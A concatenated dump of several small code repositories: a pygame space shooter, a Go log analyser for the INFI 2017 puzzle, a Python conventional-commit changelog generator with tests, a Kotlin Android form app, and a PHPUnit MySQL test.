miliseconds = int(self.ai_settings.frame_count%60)
score_str = (str(seconds) + ":" + str(miliseconds))
self.score_image = self.font.render(score_str, True, self.text_color,
self.ai_settings.bg_color)
# Display the score at the top right of the screen.
self.score_rect = self.score_image.get_rect()
self.score_rect.right = self.screen_rect.right - self.ai_settings.screen_width/2 + 25
self.score_rect.bottom = 40
def show_score(self):
self.screen.blit(self.score_image, self.score_rect)<file_sep>/README.md
# space-shooter
<h1> If you want to launch the game without python, use "shmup_installer.exe"</h1>
**pygame needed!**
**LAUNCH = alien_invasion.py**
gameplay options:
**Arrow keys - Movement**
**<kbd>A</kbd> - Fire**
Game gets slightly harder every 20 seconds, with increased kill score each level
The point of the game is simple: shoot aliens, score high, don't get hit.
Hold A and turn these poorly designed aliens to mush!!
There are powerups that can upgrade your arsenal.
You get three lives, once you lose them all, game ends.
<file_sep>/alien.py
import random
from pygame.sprite import Sprite
import pygame
RED = (255, 0, 0)
class BaseAlien(Sprite):
"""alien: skeleton body"""
def __init__(self, ai_settings, screen, images):
super(BaseAlien, self).__init__()
self.screen = screen
self.ai_settings = ai_settings
# load the alien from the image
self.image = images.alien
self.rect = self.image.get_rect()
# start new alien from top left of the screen
self.rect.x = random.randint(35, ai_settings.screen_width-35)
self.rect.y = random.randint(-4 * ai_settings.screen_height,
-1 * ai_settings.screen_height)
# store the aliens position
self.x = float(self.rect.x)
self.y = float(self.rect.y)
self.radius = 20
// pygame.draw.circle(self.image, RED, self.rect.center, self.radius)
def blitme(self):
"""draw alien on screen"""
self.screen.blit(self.image, self.rect)
def check_edges(self):
screen_rect = self.screen.get_rect()
if self.rect.right >= screen_rect.right:
return True
elif self.rect.left <= 0:
return True
def update(self):
# self.x += (self.ai_settings.alien_speed * self.ai_settings.fleet_direction)
# self.y += random.randint(self.ai_settings.alien_speed, 2*self.ai_settings.alien_speed)
self.y += self.ai_settings.alien_speed
self.rect.x = self.x
self.rect.y = self.y
def points(self):
return self.points()
def damage(self, amount):
self.health -= amount
if self.health < 0:
self.kill()
class Alien(BaseAlien):
def __init__(self, ai_settings, screen, images):
super().__init__(ai_settings, screen, images)
self.image = images.alien
self.health = ai_settings.alien_health
self.points = ai_settings.alien_points
class Alien2(BaseAlien):
def __init__(self, ai_settings, screen, images):
super().__init__(ai_settings, screen, images)
self.image = images.alien2
self.health = ai_settings.alien2_health
self.points = ai_settings.alien2_points
| f9c6690781f440ddd89566a88a2710522e018620 | [
"Markdown",
"Python"
] | 12 | Python | Dulet/shmup | 17162ce496f551b558871efd77edfba808ad2460 | 82fee176b36710dd249aad1cca67ad062d2f1713 |
refs/heads/master | <repo_name>lioda/infi-2017<file_sep>/parser.go
package main
import (
"bufio"
"errors"
"io"
)
type Parser struct {
Input io.Reader
parser *bufio.Scanner
}
func (p *Parser) Next() string {
if p.parser == nil {
p.parser = bufio.NewScanner(p.Input)
p.parser.Split(func(data []byte, atEOF bool) (advance int, token []byte, err error) {
if atEOF {
return advance, token, errors.New("end of file")
}
parsingLimit := "]"
advance = 0
result := ""
for read := ""; read != parsingLimit; {
if advance >= len(data) {
return 0, nil, nil
}
ad, t, _ := bufio.ScanRunes(data[advance:], atEOF)
read = string(t)
if read == "(" {
parsingLimit = ")"
}
result = result + read
advance = advance + ad
}
return advance, []byte(result), err
})
}
if p.parser.Scan() == false {
return "EOF"
}
result := p.parser.Text()
return result
}
<file_sep>/README.md
Code for resolving INFI 2017 challenge: https://aoc.infi.nl/
<file_sep>/anallog_test.go
package main
import (
"strings"
"testing"
"github.com/stretchr/testify/assert"
)
func TestSimpleLog(t *testing.T) {
an := NewAnalLog(strings.NewReader("[0,0][1,1](1,0)(0,-1)(0,1)(-1,0)(-1,0)(0,1)(0,-1)(1,0)"))
assert.Equal(t, 2, an.CountBottlenecks())
}
<file_sep>/robot_test.go
package main
import (
"testing"
"github.com/stretchr/testify/assert"
)
func TestCreateRobot(t *testing.T) {
assert.Equal(t, Robot{12, 58}, NewRobot("[12,58]"))
}
func TestMoveRobot(t *testing.T) {
robot := Robot{12, 58}
robot.Move("(1,-1)")
assert.Equal(t, NewRobot("[13,57]"), robot)
}
<file_sep>/main.go
package main
import (
"fmt"
"os"
)
func main() {
file, _ := os.Open("log.txt")
analyser := NewAnalLog(file)
result := analyser.CountBottlenecks()
fmt.Printf("%d bootlenecks.\n", result)
}
<file_sep>/parser_test.go
package main
import (
"os"
"strings"
"testing"
"github.com/stretchr/testify/assert"
)
func TestParseRobots(t *testing.T) {
input := "[0,0][1,1]"
parser := Parser{Input: strings.NewReader(input)}
assert.Equal(t, "[0,0]", parser.Next())
assert.Equal(t, "[1,1]", parser.Next())
}
func TestParseRobotsAndCoordinates(t *testing.T) {
input := "[0,0][1,1](1,0)(0,-1)"
parser := Parser{Input: strings.NewReader(input)}
assert.Equal(t, "[0,0]", parser.Next())
assert.Equal(t, "[1,1]", parser.Next())
assert.Equal(t, "(1,0)", parser.Next())
assert.Equal(t, "(0,-1)", parser.Next())
assert.Equal(t, "EOF", parser.Next())
}
func TestParseLargeFile(t *testing.T) {
file, _ := os.Open("large_file.txt")
parser := Parser{Input: file}
count := 0
for token := parser.Next(); token != "EOF"; token = parser.Next() {
count++
}
assert.Equal(t, 690, count)
}
<file_sep>/robot.go
package main
import (
"regexp"
"strconv"
)
type Robot struct {
X, Y int
}
func NewRobot(token string) Robot {
r, _ := regexp.Compile("\\[([^,]*),([^,]*)\\]")
// fmt.Printf("%q\n", r.FindAllStringSubmatch(token, -1))
strings := r.FindAllStringSubmatch(token, -1)
x, _ := strconv.Atoi(strings[0][1])
y, _ := strconv.Atoi(strings[0][2])
return Robot{x, y}
}
func (r *Robot) Move(coordinates string) {
re, _ := regexp.Compile("\\(([^,]*),([^,]*)\\)")
strings := re.FindAllStringSubmatch(coordinates, -1)
x, _ := strconv.Atoi(strings[0][1])
y, _ := strconv.Atoi(strings[0][2])
r.X = r.X + x
r.Y = r.Y + y
}
<file_sep>/anallog.go
package main
import (
"fmt"
"io"
"reflect"
"strings"
)
type AnalLog struct {
Log io.Reader
robots []Robot
robotIndex int
grid [][]string
}
func NewAnalLog(reader io.Reader) *AnalLog {
maxX := 50
maxY := 30
grid := make([][]string, maxY)
for i, _ := range grid {
grid[i] = make([]string, maxX)
for j, _ := range grid[i] {
grid[i][j] = " "
}
}
return &AnalLog{Log: reader, grid: grid}
}
func (a AnalLog) findBottleneck() bool {
if a.robotIndex%len(a.robots) != 0 {
return false
}
for i, r1 := range a.robots {
for j, r2 := range a.robots {
if i != j && reflect.DeepEqual(r1, r2) {
a.grid[r1.Y][r1.X] = "X"
return true
}
}
}
return false
}
func (a *AnalLog) createRobot(init string) {
if a.robots == nil {
a.robots = []Robot{}
}
a.robots = append(a.robots, NewRobot(init))
}
func (a *AnalLog) moveRobot(coordinates string) {
index := a.robotIndex % len(a.robots)
a.robots[index].Move(coordinates)
a.robotIndex++
}
func (a *AnalLog) CountBottlenecks() (result int) {
parser := Parser{Input: a.Log}
for token := parser.Next(); token != "EOF"; token = parser.Next() {
if string(token[0]) == "[" {
a.createRobot(token)
continue
}
a.moveRobot(token)
if a.findBottleneck() {
result++
}
}
fmt.Println("Display AI Message:")
for _, row := range a.grid {
fmt.Println(strings.Join(row, " "))
}
return result
}
| fddbbf159fbd1d07e6c63ca128b4534196d46567 | [
"Markdown",
"Go"
] | 8 | Go | lioda/infi-2017 | 86908b4b5eb01bdec57bb262e7c2159f6c3bfb23 | 493a6feb7c402bef8ed6fb267223abfa60f49347 |
refs/heads/master | <repo_name>metwork-framework/git_history_to_changelog<file_sep>/setup.py
from setuptools import setup
from setuptools import find_packages
with open('requirements.txt') as reqs:
install_requires = [
line for line in reqs.read().split('\n')
if (line and not line.startswith('--')) and (";" not in line)]
with open("README.md") as f:
long_description = f.read()
#Version "0.0.0" will be replaced by CI when releasing
setup(
author="<NAME>",
author_email="<EMAIL>",
name='ghtc',
version="0.0.0",
license="BSD 3",
python_requires='>=3.6',
url="https://git.meteo.fr/dsi-dev-ws/ghtc",
description="ghtc service",
long_description=long_description,
long_description_content_type="text/markdown",
packages=find_packages(),
install_requires=install_requires,
include_package_data=True,
entry_points={
"console_scripts": [
"ghtc = ghtc.cli:main",
]
}
)
<file_sep>/ghtc/models.py
from typing import Optional, List, Dict
import enum
import time
from dataclasses import dataclass, field
UNRELEASED_TAG_TIMESTAMP = 9999999999
class ConventionalCommitType(enum.Enum):
OTHER = 0
BUILD = 1
CHORE = 2
STYLE = 3
CI = 4
REFACTOR = 5
TEST = 6
DOCS = 7
PERF = 8
FIX = 9
FEAT = 10
@dataclass(frozen=True)
class ConventionalCommitFooter:
key: str
value: str
@dataclass(frozen=True, unsafe_hash=True)
class ConventionalCommitMessage:
type: ConventionalCommitType
description: str
breaking: bool
scope: Optional[str]
body: Optional[str]
footers: List[ConventionalCommitFooter]
@dataclass(frozen=True)
class ChangelogLine:
commit_message: ConventionalCommitMessage
commit_sha: str
commit_timestamp: int
commit_date: str = field(init=False)
def __post_init__(self):
object.__setattr__(
self,
"commit_date",
time.strftime("%Y-%m-%d", time.gmtime(self.commit_timestamp)),
) # because frozen=True, we have to use this ugly __setattr__
@dataclass(frozen=True)
class ChangelogEntryForATag:
tag_name: str
tag_timestamp: int
lines_by_type: Dict[ConventionalCommitType, List[ChangelogLine]]
tag_date: str = field(init=False)
def __post_init__(self):
object.__setattr__(
self, "tag_date", time.strftime("%Y-%m-%d", time.gmtime(self.tag_timestamp))
) # because frozen=True, we have to use this ugly __setattr__
<file_sep>/tests/test_parser.py
from ghtc.parser import parse, ConventionalCommitType
MSG1 = """feat: allow provided config object to extend other configs
BREAKING CHANGE: `extends` key in config file is now used for extending other config files
"""
MSG2 = """refactor!: drop support for Node 6"""
MSG3 = """refactor!: drop support for Node 6
BREAKING CHANGE: refactor to use JavaScript features not available in Node 6.
"""
MSG4 = """docs: correct spelling of CHANGELOG"""
MSG5 = """feat(lang): add polish language"""
MSG6 = """fix: correct minor typos in code
see the issue for details
on typos fixed.
Reviewed-by: Z
Refs #133
"""
def test_valid_messages():
msg = parse(MSG1)
assert msg.type == ConventionalCommitType.FEAT
assert msg.breaking
assert msg.body is None
assert msg.scope is None
assert msg.description == "allow provided config object to extend other configs"
assert len(msg.footers) == 1
assert msg.footers[0].key == "BREAKING CHANGE"
assert msg.footers[0].value == (
"`extends` key in config file is now used for extending other config files"
)
msg = parse(MSG2)
assert msg.type == ConventionalCommitType.REFACTOR
assert msg.breaking
assert msg.body is None
assert msg.scope is None
assert msg.description == "drop support for Node 6"
assert len(msg.footers) == 0
msg = parse(MSG3)
assert msg.type == ConventionalCommitType.REFACTOR
assert msg.breaking
assert msg.body is None
assert msg.scope is None
assert msg.description == "drop support for Node 6"
assert len(msg.footers) == 1
assert msg.footers[0].key == "BREAKING CHANGE"
assert msg.footers[0].value == (
"refactor to use JavaScript features not available in Node 6."
)
msg = parse(MSG4)
assert msg.type == ConventionalCommitType.DOCS
assert msg.breaking is False
assert msg.body is None
assert msg.scope is None
assert msg.description == "correct spelling of CHANGELOG"
assert len(msg.footers) == 0
msg = parse(MSG5)
assert msg.type == ConventionalCommitType.FEAT
assert msg.breaking is False
assert msg.body is None
assert msg.scope == "lang"
assert msg.description == "add polish language"
assert len(msg.footers) == 0
msg = parse(MSG6)
assert msg.type == ConventionalCommitType.FIX
assert msg.breaking is False
assert msg.body == "see the issue for details\non typos fixed."
assert msg.scope is None
assert msg.description == "correct minor typos in code"
assert len(msg.footers) == 2
assert msg.footers[0].key == "Reviewed-by"
assert msg.footers[0].value == "Z"
assert msg.footers[1].key == "Refs"
assert msg.footers[1].value == "133"
<file_sep>/Makefile
.PHONY: tests doc clean lint quick_tests
PROJECT=ghtc
lint:
mypy --show-error-codes --ignore-missing-imports $(PROJECT)
flake8 --max-line-length 88 --ignore=D100,D101,D102,D103,D104,D107,D106,D105,W503,E203 $(PROJECT)
black --check $(PROJECT)
tests: lint
export PYTHONPATH=".:${PYTHONPATH}"; pytest
black:
black $(PROJECT)
coverage:
export PYTHONPATH=".:${PYTHONPATH}"; pytest --cov=$(PROJECT) tests/
export PYTHONPATH=".:${PYTHONPATH}"; pytest --cov=$(PROJECT) --cov-report=html tests/
<file_sep>/ghtc/CHANGELOG.md
# {{ TITLE|default("CHANGELOG") }}
{%
set TYPE_MAPPINGS = {
"OTHER": "Other",
"BUILD": "Dev stuff",
"CHORE": "Dev stuff",
"STYLE": "Code style",
"CI": "Continuous Integration",
"REFACTOR": "Refactoring",
"TEST": "Tests",
"DOCS": "Documentation",
"PERF": "Performances",
"FIX": "Bug Fixes",
"FEAT": "New Features"
}
%}
{% for ENTRY_FOR_A_TAG in TAGS|sort(attribute="tag_timestamp", reverse=True) -%}
## {{ ENTRY_FOR_A_TAG.tag_name }}{% if ENTRY_FOR_A_TAG.tag_timestamp != UNRELEASED_TAG_TIMESTAMP %} ({{ ENTRY_FOR_A_TAG.tag_date }}){% endif %}
{% if ENTRY_FOR_A_TAG.lines_by_type|length == 0 -%}
- No interesting change
{% endif -%}
{% for CAT, LINES in ENTRY_FOR_A_TAG.lines_by_type.items()|sort(attribute='0.value', reverse=True) -%}
{% if LINES|length > 0 -%}
### {{ TYPE_MAPPINGS.get(CAT.name, CAT.name) }}
{% for LINE in LINES|sort(attribute='commit_timestamp', reverse=False) -%}
- {{ LINE.commit_message.description }}{% if DEBUG %} { commit_hash: {{LINE.commit_sha}}, commit_date: {{LINE.commit_date}} }{% endif %}
{% endfor %}
{% endif -%}
{% endfor -%}
{% endfor -%}
<file_sep>/CHANGELOG.md
# CHANGELOG
## v0.2.0 (2021-02-12)
### New Features
- add debug mode and fix changelog override
## v0.1.0 (2021-01-25)
### New Features
- add overrides feature (and fixes)
## v0.0.1 (2021-01-13)
### New Features
- we can use git revisions and not only tags
- add better starting_rev default
### Bug Fixes
- fix with empty starting-rev option
- fix issue with first commit
- fix boolean options
<file_sep>/ghtc/overrides.py
from typing import Dict, Optional
import os
import re
from ghtc.models import ConventionalCommitMessage
from ghtc.parser import parse
import mflog
GIT_COMMIT_DELIMITER_REGEX = r"^\[([0-9a-f]{5,40})\]$"
GIT_COMMIT_DELIMITER_COMPILED_REGEX = re.compile(GIT_COMMIT_DELIMITER_REGEX)
LOGGER = mflog.get_logger("ghtc.overrides")
class Overrides:
def __init__(self, path):
self.path = path
self.commits: Dict[str, Optional[ConventionalCommitMessage]] = {}
def parse(self):
if not os.path.isfile(self.path):
return
with open(self.path, "r") as f:
commit: Optional[str] = None
commit_message: Optional[str] = None
for tmp in f.readlines():
line = tmp.strip()
if commit is None and len(line) == 0:
continue
match = GIT_COMMIT_DELIMITER_COMPILED_REGEX.match(line)
if match is None:
if commit is None:
LOGGER.warning("badly formatted overrides file => ignoring")
return False
if commit_message is None:
if len(line) > 0:
commit_message = line
else:
commit_message = commit_message + "\n" + line
else:
if commit is not None:
self.commits[commit] = self._parse(commit, commit_message)
commit = match[1]
commit_message = None
if commit is not None:
self.commits[commit] = self._parse(commit, commit_message)
return True
def _parse(self, commit, commit_message) -> Optional[ConventionalCommitMessage]:
res: Optional[ConventionalCommitMessage] = None
if commit_message is not None:
res = parse(commit_message)
if res is None:
LOGGER.warning(
f"can't parse overriden commit "
f"message for commit: {commit} => ignoring"
)
return res
<file_sep>/requirements.txt
typer
mfutil
GitPython==3.1.14
mflog
<file_sep>/tests/test_overrides.py
import tempfile
import os
from mfutil import get_unique_hexa_identifier
from ghtc.overrides import Overrides
from ghtc.models import ConventionalCommitType
PARSE1 = """
[123456]
feat: this is a test
Close: #456
[aaaaaa]
fix: this is another test
[bbbbbb]
"""
def make_tmp_filepath(content: str):
path = os.path.join(tempfile.gettempdir(), get_unique_hexa_identifier())
with open(path, "w") as f:
f.write(content)
return path
def test_not_found():
x = Overrides("/foo/bar/not_found")
x.parse()
assert len(x.commits) == 0
def test_parse1():
path = make_tmp_filepath(PARSE1)
x = Overrides(path)
x.parse()
assert len(x.commits) == 3
assert x.commits["123456"].type == ConventionalCommitType.FEAT
assert x.commits["123456"].description == "this is a test"
assert x.commits["123456"].footers[0].key == "Close"
assert x.commits["123456"].footers[0].value == "#456"
assert x.commits["aaaaaa"].type == ConventionalCommitType.FIX
assert x.commits["aaaaaa"].description == "this is another test"
assert x.commits["bbbbbb"] is None
os.unlink(path)
<file_sep>/dev-requirements.txt
-r requirements.txt
mypy
flake8
pytest
pytest-cov
black
<file_sep>/ghtc/cli.py
from typing import Any, Dict, List, Optional
from typer import Typer, Argument, Option
from git import Repo
from ghtc.utils import (
get_tags,
get_commits_between,
render_template,
get_reverted_commit,
)
from ghtc.models import (
ChangelogLine,
ChangelogEntryForATag,
ConventionalCommitMessage,
ConventionalCommitType,
UNRELEASED_TAG_TIMESTAMP,
)
from ghtc.parser import parse
from ghtc.overrides import Overrides
app = Typer(add_completion=False)
ALL_TYPES = ", ".join([x.name.lower() for x in ConventionalCommitType])
@app.command()
def cli(
repo_root: str = Argument(..., help="the fullpath to the git repository"),
tags_regex: str = Option(
"^v[0-9]", help="regex to select tags to show on changelog"
),
starting_rev: str = Option(
None,
help="starting revision (if not set latest tag starting with "
"ghtc_changelog_start if exists, else first git commit)",
),
remove_duplicates_entries: bool = Option(
True, help="if True, remove duplicate entries"
),
unreleased: bool = Option(
True, help="if True, add a section about unreleased changes"
),
override_file: str = Option(
".ghtc_overrides.ini", help="the path/name of the 'commit overrides' file"
),
include_type: List[str] = Option(
[],
help="include (only) given conventional types in changelog (can be used "
"multiple times, all types by default), available types: %s" % ALL_TYPES,
),
title: str = "CHANGELOG",
unreleased_title: str = "[Unreleased]",
debug: bool = Option(False, help="add debug values for each changelog entry"),
):
overrides = Overrides(override_file)
overrides.parse()
repo = Repo(repo_root)
previous_tag = starting_rev
context: Dict[str, Any] = {
"TITLE": title,
"UNRELEASED_TAG_TIMESTAMP": UNRELEASED_TAG_TIMESTAMP,
"TAGS": [],
}
tags = get_tags(repo, tags_regex)
if len(include_type) == 0:
# if include_type is empty, we consider we want all types
included_cats = [x.name.lower() for x in list(ConventionalCommitType)]
else:
included_cats = [x.strip().lower() for x in include_type]
if unreleased:
tags.append(None)
for tag in tags:
if tag is None:
tag_name = unreleased_title
tag_date = UNRELEASED_TAG_TIMESTAMP
rev = None
else:
tag_name = tag.name
tag_date = tag.object.authored_date
rev = tag_name
reverted_commits = []
for commit in get_commits_between(repo, previous_tag, rev):
reverted_commit = get_reverted_commit(commit)
if reverted_commit is not None:
reverted_commits.append(reverted_commit)
lines: Dict[ConventionalCommitType, List[ChangelogLine]] = {}
for commit in get_commits_between(repo, previous_tag, rev):
if commit.hexsha in reverted_commits:
continue
msg: Optional[ConventionalCommitMessage] = None
if commit.hexsha in overrides.commits:
msg = overrides.commits[commit.hexsha]
if msg is None:
# ignored message
continue
else:
msg = parse(commit.message)
if msg is None:
continue
cat = msg.type
if cat.name.lower() not in included_cats:
continue
cline = ChangelogLine(msg, commit.hexsha, commit.committed_date)
if cat not in lines:
lines[cat] = []
if remove_duplicates_entries and cline in lines[cat]:
continue
lines[cat].insert(0, cline)
entry = ChangelogEntryForATag(tag_name, tag_date, lines)
if tag is not None or len(lines) > 0:
context["TAGS"].append(entry)
context["DEBUG"] = debug
previous_tag = tag
print(render_template(context))
def main():
app()
if __name__ == "__main__":
main()
<file_sep>/ghtc/utils.py
from typing import List, Optional
import os
import jinja2
from git import Repo, Tag, Commit
import re
CURRENT_DIR = os.path.dirname(os.path.realpath(__file__))
class TagNotFound(Exception):
pass
def get_tags(repo: Repo, tag_regex: str) -> List[Tag]:
compiled_pattern = re.compile(tag_regex)
res = []
for tag in repo.tags:
if re.match(compiled_pattern, tag.name):
res.append(tag)
return sorted(res, key=lambda x: x.object.authored_date)
def get_first_commit(repo: Repo) -> Commit:
return list(repo.iter_commits(max_parents=0))[0]
def get_commits_between(repo: Repo, rev1: str = None, rev2: str = None) -> List[Commit]:
kwargs = {}
first_commit = None
if rev1 is None or rev1 == "":
tmp_tags = get_tags(repo, "^ghtc_changelog_start")
if len(tmp_tags) >= 1:
tag1_name = tmp_tags[-1]
else:
first_commit = get_first_commit(repo)
tag1_name = first_commit.hexsha
else:
tag1_name = rev1
tag2_name = "HEAD" if rev2 is None or rev2 == "" else rev2
kwargs["rev"] = f"{tag1_name}..{tag2_name}"
tmp = list(repo.iter_commits(**kwargs))
if first_commit is None:
return tmp
# we also include first commit in list
return [first_commit] + tmp
def render_template(context, template_file: str = None) -> str:
if template_file is not None:
template_to_read = template_file
else:
template_to_read = f"{CURRENT_DIR}/CHANGELOG.md"
with open(template_to_read, "r") as f:
content = f.read()
template = jinja2.Template(content)
return template.render(context)
def get_reverted_commit(commit: Commit) -> Optional[str]:
for tmp in commit.message.splitlines():
line = tmp.strip()
if line.startswith("This reverts commit "):
sha = line.replace("This reverts commit ", "").split(".")[0]
if len(sha) >= 40:
return sha
return None
<file_sep>/ghtc/parser.py
from typing import Optional, List, Dict
import re
from ghtc.models import (
ConventionalCommitType,
ConventionalCommitFooter,
ConventionalCommitMessage,
)
TYPE_MAPPINGS: Dict[str, ConventionalCommitType] = {
"feat": ConventionalCommitType.FEAT,
"fix": ConventionalCommitType.FIX,
"build": ConventionalCommitType.BUILD,
"chore": ConventionalCommitType.CHORE,
"ci": ConventionalCommitType.CI,
"docs": ConventionalCommitType.DOCS,
"doc": ConventionalCommitType.DOCS,
"style": ConventionalCommitType.STYLE,
"refactor": ConventionalCommitType.REFACTOR,
"perf": ConventionalCommitType.PERF,
"perfs": ConventionalCommitType.PERF,
"test": ConventionalCommitType.TEST,
"tests": ConventionalCommitType.TEST,
}
TITLE_REGEX = r"^([a-zA-Z0-9_-]+)(!{0,1})(\([a-zA-Z0-9_-]*\)){0,1}(!{0,1}): (.*)$"
TITLE_COMPILED_REGEX = re.compile(TITLE_REGEX)
FOOTER_REGEX1 = r"^([a-zA-Z0-9_-]+): (.*)$"
FOOTER_COMPILED_REGEX1 = re.compile(FOOTER_REGEX1)
FOOTER_REGEX2 = r"^([a-zA-Z0-9_-]+) #(.*)$"
FOOTER_COMPILED_REGEX2 = re.compile(FOOTER_REGEX2)
BREAKING_CHANGE_FOOTER_REGEX = r"^BREAKING[- ]CHANGE: (.*)$"
BREAKING_CHANGE_FOOTER_COMPILED_REGEX = re.compile(BREAKING_CHANGE_FOOTER_REGEX)
def type_string_to_commit_type(type_str: str) -> ConventionalCommitType:
if type_str not in TYPE_MAPPINGS:
return ConventionalCommitType.OTHER
return TYPE_MAPPINGS[type_str]
def parse(commit_message: str) -> Optional[ConventionalCommitMessage]:
if not commit_message:
return None
lines = commit_message.splitlines()
first_line = lines[0]
match = TITLE_COMPILED_REGEX.match(first_line)
if match is None:
return None
type_str = match[1].lower()
breaking = False
if match[2] or match[4]:
breaking = True
scope = None
if match[3]:
scope = match[3].lower()[1:-1]
description = match[5]
body = None
footers: List[ConventionalCommitFooter] = []
if len(lines) > 1 and lines[1] == "":
for line in lines[1:]:
if not line:
continue
tmp1 = FOOTER_COMPILED_REGEX1.match(line)
tmp2 = FOOTER_COMPILED_REGEX2.match(line)
tmp3 = BREAKING_CHANGE_FOOTER_COMPILED_REGEX.match(line)
if len(footers) == 0 and tmp1 is None and tmp2 is None and tmp3 is None:
if body is None:
body = f"{line}"
else:
body += f"\n{line}"
else:
if tmp3 is not None:
breaking = True
footers.append(ConventionalCommitFooter("BREAKING CHANGE", tmp3[1]))
elif tmp1 is not None:
footers.append(ConventionalCommitFooter(tmp1[1], tmp1[2]))
elif tmp2 is not None:
footers.append(ConventionalCommitFooter(tmp2[1], tmp2[2]))
return ConventionalCommitMessage(
type=type_string_to_commit_type(type_str),
scope=scope,
body=body,
footers=footers,
description=description,
breaking=breaking,
)
| eea47658cd6883842ce221f30bd82b3b0c0a3d9f | [
"Markdown",
"Python",
"Makefile",
"Text"
] | 13 | Python | metwork-framework/git_history_to_changelog | ca9e599f3f700faa3f3b5792317a4fffe6865814 | ea775824c512a3aa096f00c0a8053a90a29d3821 |
refs/heads/main | <file_sep>package com.example.multipleactivitiesbonus
import android.view.LayoutInflater
import android.view.ViewGroup
import androidx.recyclerview.widget.RecyclerView
import com.example.multipleactivitiesbonus.databinding.ItemRowBinding
class Adapter(private val info: ArrayList<String>?): RecyclerView.Adapter<Adapter.itemViewHolder>(){
class itemViewHolder(val binding: ItemRowBinding) : RecyclerView.ViewHolder(binding.root)
override fun onCreateViewHolder(parent: ViewGroup, viewType: Int): itemViewHolder {
return itemViewHolder(ItemRowBinding.inflate(LayoutInflater.from(parent.context),parent,false))
}
override fun onBindViewHolder(holder: itemViewHolder, position: Int) {
val user = info!![position]
holder.binding.apply {
tv3.text = user
}
}
override fun getItemCount() = info!!.size
}<file_sep>package com.example.multipleactivitiesbonus
import android.content.DialogInterface
import android.content.Intent
import androidx.appcompat.app.AppCompatActivity
import android.os.Bundle
import android.widget.Button
import android.widget.TextView
import androidx.appcompat.app.AlertDialog
class confirmationActivity : AppCompatActivity() {
lateinit var tv :TextView
lateinit var button2: Button
lateinit var info:ArrayList<String>
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
setContentView(R.layout.activity_confirmation)
info = arrayListOf()
tv = findViewById(R.id.tv)
val name = intent.getStringExtra("name").toString()
val location = intent.getStringExtra("location").toString()
val phone = intent.getStringExtra("phone").toString()
val email = intent.getStringExtra("email").toString()
var infoText = "Name : ${name}\nlocation: ${location} \nphone: ${phone} \nemail: ${email}"
tv.text = infoText
button2 = findViewById(R.id.button2)
button2.setOnClickListener {
val dialogBuilder = AlertDialog.Builder(this)
val tvAlert = TextView(this)
tvAlert.text = infoText
dialogBuilder.setMessage("Are you sure?")
.setPositiveButton("yes", DialogInterface.OnClickListener { _, _ ->
val intent = Intent(this , confirmedActivity::class.java)
info.add(name)
info.add(location)
info.add(phone)
info.add(email)
intent.putExtra("info", info)
// intent.putExtra("name", name)
// intent.putExtra("location", location)
// intent.putExtra("phone", phone)
// intent.putExtra("email", email)
startActivity(intent)
})
val alert = dialogBuilder.create()
alert.setView(tvAlert)
alert.show()
}
}
}<file_sep>package com.example.multipleactivitiesbonus
import android.content.DialogInterface
import android.content.Intent
import androidx.appcompat.app.AppCompatActivity
import android.os.Bundle
import android.widget.Button
import android.widget.CheckBox
import android.widget.EditText
import android.widget.Toast
import androidx.appcompat.app.AlertDialog
class MainActivity : AppCompatActivity() {
lateinit var name: EditText
lateinit var location: EditText
lateinit var phone: EditText
lateinit var email: EditText
lateinit var cb: CheckBox
lateinit var button: Button
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
setContentView(R.layout.activity_main)
name = findViewById(R.id.name)
location = findViewById(R.id.location)
phone = findViewById(R.id.phone)
email = findViewById(R.id.email)
cb = findViewById(R.id.checkBox)
button = findViewById(R.id.button)
button.setOnClickListener {
if(name.text.toString() != "" && location.text.toString() != "" && phone.text.toString() != "" && email.text.toString() != "") {
if (cb.isChecked) {
val intent = Intent(this, confirmationActivity::class.java)
intent.putExtra("name", name.text.toString())
intent.putExtra("location", location.text.toString())
intent.putExtra("phone", phone.text.toString())
intent.putExtra("email", email.text.toString())
startActivity(intent)
} else {
val dialogBuilder = AlertDialog.Builder(this)
dialogBuilder.setMessage("please check the box")
.setPositiveButton("OK", DialogInterface.OnClickListener { _, _ ->
})
val alert = dialogBuilder.create()
alert.show()
}
}else{
Toast.makeText(this, "All fields must be filled", Toast.LENGTH_LONG).show()
}
}
}
}<file_sep>package com.example.multipleactivitiesbonus
import android.annotation.SuppressLint
import android.content.Intent
import androidx.appcompat.app.AppCompatActivity
import android.os.Bundle
import android.view.Menu
import android.view.MenuItem
import androidx.recyclerview.widget.LinearLayoutManager
import androidx.recyclerview.widget.RecyclerView
class confirmedActivity : AppCompatActivity() {
lateinit var rv:RecyclerView
lateinit var adapter:Adapter
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
setContentView(R.layout.activity_confirmed)
val info = intent.extras?.getStringArrayList("info")
rv = findViewById(R.id.rv)
adapter = Adapter(info)
rv.adapter = Adapter(info)
rv.layoutManager = LinearLayoutManager(this)
}
override fun onCreateOptionsMenu(menu: Menu?): Boolean {
menuInflater.inflate(R.menu.main_menu, menu)
return true
}
@SuppressLint("RestrictedApi")
override fun onOptionsItemSelected(item: MenuItem): Boolean {
when(item.itemId){
R.id.home -> {
val intent = Intent(this , MainActivity::class.java)
startActivity(intent)
return true
}
R.id.exit -> {
moveTaskToBack(true)
android.os.Process.killProcess(android.os.Process.myPid())
System.exit(1)
return true
}
}
return super.onOptionsItemSelected(item)
}
} | 78998ebe38acffb1f1fa3d7082b19a805a16f3a2 | [
"Kotlin"
] | 4 | Kotlin | Amal001001/Multiple-Activities--Bonus- | 005e87fe1ba5e576cffac2ebf65fb190308f8a36 | 9f1a5e254223e945846cc58e8c45cd247bba4fa3 |
refs/heads/master | <file_sep><?php
/**
* @author ngyuki
*/
class SampleTest extends \PHPUnit\Framework\TestCase
{
/**
* @test
*/
public function test()
{
$host = getenv('MYSQL_HOST');
$port = getenv('MYSQL_PORT');
$dbname = getenv('MYSQL_DATABASE');
$user = getenv('MYSQL_USER');
$pass = getenv('MYSQL_PASSWORD');
$pdo = new PDO("mysql:dbname=$dbname;host=$host;port=$port;charset=utf8", $user, $pass,
[
PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION
]
);
$pdo->query('drop table if exists t');
$pdo->query('create table t (id int not null primary key)');
$pdo->query('insert into t values (123)');
$val = $pdo->query('select * from t')->fetchColumn();
$this->assertEquals($val, 123);
}
}
| fbbf946c548f5559b340801b5fa478856f2f7499 | [
"PHP"
